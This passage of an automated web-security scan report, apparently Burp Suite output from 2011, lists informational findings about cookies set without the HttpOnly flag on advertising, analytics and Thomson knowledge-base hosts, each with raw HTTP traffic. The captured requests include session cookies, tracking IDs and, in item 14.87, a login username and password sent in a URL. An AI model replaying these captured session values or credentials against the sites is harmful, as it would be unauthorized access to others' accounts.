Referer: http://www.realtor.com/search/widgetportal/Widget.aspx?wname=MainSearchXSLContainer&app=8bcac8850c63428982ba6b6b90c09cfa&zip=75207
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 18:47:10 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DB8997051D1B21-6000010BE02C4C20[CE]; Expires=Sun, 24 Apr 2016 18:47:10 GMT; Domain=homestore.122.2o7.net; Path=/
Location: http://homestore.122.2o7.net/b/ss/movesyndication/1/H.2-pdv-2/s62061750586144?AQB=1&pccr=true&vidn=26DB8997051D1B21-6000010BE02C4C20&&ndh=1&t=26/3/2011%2013%3A47%3A18%202%20300&ns=homestore&pageName=FAH%3AMSN%3A%20display%3Awidget&g=http%3A//www.realtor.com/search/widgetportal/Widget.aspx%3Fwname%3DMainSearchXSLContainer%26app%3D8bcac8850c63428982ba6b6b90c09cfa%26zip%3D75207&r=http%3A//realestate.msn.com/article.aspx%3Fcp-documentid%3D28280145&cc=USD&ch=FAH%3AMSN&events=event10&v10=FAH%3AMSN&c12=New%20York%2C%20NY&c13=FAH%3AMSN%3A%20display%3Awidget&c20=FAH%3AMSN%3A%20display%3Awidget&c21=RDC%3A%20FAH%3AMSN%3A%20display%3Awidget&v21=Realtor.com&c22=RDC%3A%20FAH%3AMSN&v22=RDC%3A%20FAH%3AMSN&c23=Realtor.com&v24=Not%20Registered&v25=RDC%3AArrowhead%3AB&c26=Not%20Registered&c27=www.realtor.com&c30=38.705&c38=RDC%3AArrowhead%3AB&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=300&bh=328&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Mon, 25 Apr 2011 18:47:10 GMT
Last-Modified: Wed, 27 Apr 2011 18:47:10 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www95
Content-Length: 0
Content-Type: text/plain


14.82. http://i.kissmetrics.com/i.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.kissmetrics.com
Path:   /i.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i.js HTTP/1.1
Host: i.kissmetrics.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/list/most_popular
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=864000000, public
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 21:46:14 GMT
ETag: "ZEtF5LlpqXlV9eDTnhh0xLfL3xw"
Expires: Sat, 11 Sep 2038 21:46:14 GMT
Last-Modified: Tue, 26 Apr 2011 20:46:14 GMT
P3P: CP="NOI CURa ADMa DEVa TAIa OUR IND UNI INT"
Server: nginx
Set-Cookie: _km_cid=ZEtF5LlpqXlV9eDTnhh0xLfL3xw;expires=Sat, 11 Sep 2038 21:46:14 GMT;path=/;
Content-Length: 79
Connection: keep-alive

var KMCID='ZEtF5LlpqXlV9eDTnhh0xLfL3xw';if(typeof(_kmil) == 'function')_kmil();

14.83. http://idcs.interclick.com/Segment.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=93da1b37-e1d8-4a3d-98bc-070baa31f827 HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306&browse_products=160547
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=c3e2564e-78bb-4fe5-b016-9ebe8e804603; tpd=e20=1305834684215&e90=1303847484419&e50=1305834684416&e100=1303847484462; sgm=8239=734250&8144=734251&9621=734251

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=8239=734250&8144=734251&9621=734251&9234=734252; domain=.interclick.com; expires=Mon, 26-Apr-2021 20:05:54 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Tue, 26 Apr 2011 20:05:54 GMT

GIF89a.............!.......,...........D..;

14.84. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0xJnR5cGU9MSZjb2RlPTYxNyZ0bD0xNTc2ODAw HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/ca.html?ra=8435996260.2377219032496214&rb=271&ca=1783&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre843599625685&pb=&pc=&pd=&pg=&ct=1303843599626
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; KRTBCOOKIE_133=1873-xrd52zkwjuxh; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:46:40 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451600; domain=pubmatic.com; expires=Fri, 25-Apr-2014 18:46:40 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

14.85. http://kbportal.thomson.com/display/2/index.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /display/2/index.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /display/2/index.aspx?tab=browse&c=&cpc=&cid=&cat=&catURL=&r=0.8218797 HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c=undefined571419undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; PortalSettings=cpId~21|ClientId~12|DisplayMode~2|AutoComplete~True|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/20/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; BIGipServerKB-80=428295335.20480.0000; IWICategory=IWICategory=21; s_cc=true; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Shipping%20Information; s_ppv=0; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:04:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: IWICategory=IWICategory=; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 975


<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>West Researc
...[SNIP]...

14.86. http://kbportal.thomson.com/display/2/kb/cat.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /display/2/kb/cat.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /display/2/kb/cat.aspx?cid= HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://kbportal.thomson.com/display/2/_leftframe.aspx?tab=browse&searchstring=&searchtype=&searchby=&cat=&catURL=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c=undefined571419undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; PortalSettings=cpId~21|ClientId~12|DisplayMode~2|AutoComplete~True|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/20/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; BIGipServerKB-80=428295335.20480.0000; s_cc=true; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Shipping%20Information; s_sq=%5B%5BB%5D%5D; s_ppv=100; IWICategory=IWICategory=

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 20:05:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /pc/12/categoryList/21/2/cat_index.html?r=0.2640597
Set-Cookie: IWICategory=IWICategory=; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 168

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/pc/12/categoryList/21/2/cat_index.html?r=0.2640597'>here</a>.</h2>
</body></html>

14.87. http://kbportal.thomson.com/display/2/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /display/2/login.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /display/2/login.aspx?cpid=21&username=CSO&password=CSO&c=12&cpc=0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70&cid=21&t=&aid=&cat=&catURL=&r=0.754933476448059&searchstring=&searchtype= HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; c_m2=1; c=undefined571419undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_ppv=0; s_sq=%5B%5BB%5D%5D; IWICategory=IWICategory=21; ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; PortalSettings=cpId~21|ClientId~12|DisplayMode~2|AutoComplete~True|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/20/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; BIGipServerKB-80=428295335.20480.0000

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 20:04:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /display/2/tab.aspx?t=&aid=&cat=&catURL=&r=0.8401849
Set-Cookie: IWICategory=IWICategory=21; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: knowledgebase=cookie_username=; expires=Fri, 26-Apr-1991 05:00:00 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 185

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/display/2/tab.aspx?t=&amp;aid=&amp;cat=&amp;catURL=&amp;r=0.8401849'>here</a>.</h2>
</body></html>

14.88. http://kbportal.thomson.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: kbportal.thomson.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Content-Length: 854
Content-Type: image/x-icon
Last-Modified: Fri, 19 Jun 2009 02:38:32 GMT
Accept-Ranges: bytes
ETag: "04f987f0c91:268"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 18 Oct 2011 11:55:41 GMT
Set-Cookie: BIGipServerKB-80=428295335.20480.0000; path=/

GIF89a..................................................................................................................................................................................................
...[SNIP]...

14.89. http://kbportal.thomson.com/images/clearpixel.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /images/clearpixel.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/clearpixel.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: kbportal.thomson.com

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Fri, 19 Jun 2009 02:38:34 GMT
Accept-Ranges: bytes
ETag: "03140a87f0c91:268"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 18 Oct 2011 11:59:05 GMT
Set-Cookie: BIGipServerKB-80=428295335.20480.0000; path=/

GIF89a.............!.......,...........D..;

14.90. http://kbportal.thomson.com/images/poweredbydark.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /images/poweredbydark.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/poweredbydark.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: kbportal.thomson.com

Response

HTTP/1.1 200 OK
Content-Length: 2366
Content-Type: image/png
Last-Modified: Fri, 19 Jun 2009 02:38:34 GMT
Accept-Ranges: bytes
ETag: "03140a87f0c91:268"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 18 Oct 2011 11:59:02 GMT
Set-Cookie: BIGipServerKB-80=428295335.20480.0000; path=/

.PNG
.
...IHDR.............(7.k....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....IDAThC..}h.U..g[....re..{....R.nw....V..#A..1t2...\..1..l.._.#?p...:A1....1.K..........;{
...[SNIP]...

14.91. http://kbportal.thomson.com/index.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /index.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.aspx?t=&article=&c=12&cid=21&cpc= HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; c_m2=1; c=undefined571419burp; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849784869%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303850887310%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_sq=%5B%5BB%5D%5D; s_ppv=100; ASP.NET_SessionId=wmip5h2o1slpk445xan1ev45; BIGipServerKB-80=2240234663.20480.0000; LangCode=en-US; LangId=1; IWICategory=IWICategory=21

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 20:59:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
P3P: CP=CAO, PSA, OUR
Location: /display/2/index.aspx?c=12&cpc=&cid=21&cat=&catURL=&r=0.521203994750977
Set-Cookie: IWICategory=IWICategory=21; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: LangCode=en-US; expires=Thu, 26-May-2011 20:59:45 GMT; path=/
Set-Cookie: LangId=1; expires=Thu, 26-May-2011 20:59:45 GMT; path=/
Set-Cookie: PortalSettings=cpId~88|ClientId~12|DisplayMode~2|AutoComplete~True|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~B3B3BA|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/BuiltIn/Default/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 208

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/display/2/index.aspx?c=12&amp;cpc=&amp;cid=21&amp;cat=&amp;catURL=&amp;r=0.521203994750977'>here</a>.</h2>
</body><
...[SNIP]...

14.92. http://kbportal.thomson.com/js/default.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /js/default.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/default.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: kbportal.thomson.com

Response

HTTP/1.1 200 OK
Content-Length: 30047
Content-Type: application/x-javascript
Last-Modified: Fri, 07 May 2010 18:52:26 GMT
Accept-Ranges: bytes
ETag: "051736f16eeca1:268"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 18 Oct 2011 11:59:02 GMT
Set-Cookie: BIGipServerKB-80=428295335.20480.0000; path=/

if (typeof(Page) != "undefined")
{
   alert("default.js should NOT be loaded more than once!")
}
var Page = [];
Page.RR_divs = [];
Page.InitTimer = null;
Page.Started = false;
Page.InitTimer2 =
...[SNIP]...

14.93. http://leadback.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=unponl_cs=1&betq=8288=401583 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1676624;type=count339;cat=landi852;u2=14610_0957_9_95;u4=38954353;u5=;u6=;u7=;ord=1;num=4579132553189.993?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; BASE=RgwqoyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGAOUajnq9Kr8LAPA72buRiJhbHyGHv70yPsyIf845qx6eWI/QdsmU5nm47UK47HID!; F1=BIaw02E; ROLL=boAno2yqJFBg26I!; C2=wGMtN5pqHIxFG/lovgg3sYMBSKMCItdhwgQ3WXIMIMa4FCDCKGehwgQ3gZIM1qKCaMrxEU7qIEysGCTkBgAoNXUWxOCCsRpBx0I9IsfzFv0i4iQBwWcYw6JCvHpBwVJ9IsuoGH2kQhANZXAcs6OCBMnBwRrcIsNrGAXqHgwzeZAc; GUID=MTMwMzY5MTY5NjsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 26 Apr 2011 18:46:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
